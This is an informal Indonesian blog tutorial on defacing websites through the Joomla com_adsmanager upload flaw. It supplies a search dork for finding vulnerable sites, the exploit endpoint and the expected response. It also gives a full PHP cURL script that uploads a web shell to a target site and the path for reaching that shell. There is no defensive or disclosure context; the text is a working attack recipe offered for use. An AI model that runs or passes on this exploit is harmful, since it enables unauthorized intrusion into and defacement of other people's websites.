Deface Dengan Teknik Com_Adsmanager (2015)

Kali ini orang cupu mau share totorial deface dengan com_adsmanager yang lagi hot neh :v xixixixi langsung simak aja yak :3

Bahan :
Xampp

Shell
PHP Code
Kesabaran :v

Udah siap? Oke langsung :3
Default Dork : inurl:/index.php?option=com_adsmanager/ (kembangin lagi biar Joss)
Exploit: /index.php?option=com_adsmanager&task=upload&tmpl=component
Vuln : {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}

#PHP Code:

<?php
$url = "http://target.co.li/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@cupushell.jpg",
"name" => "cupushell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

Acces Shell: http://target.co.li/tmp/plupload/cupushell.php

Sekian Dari Saya :3 xixixixi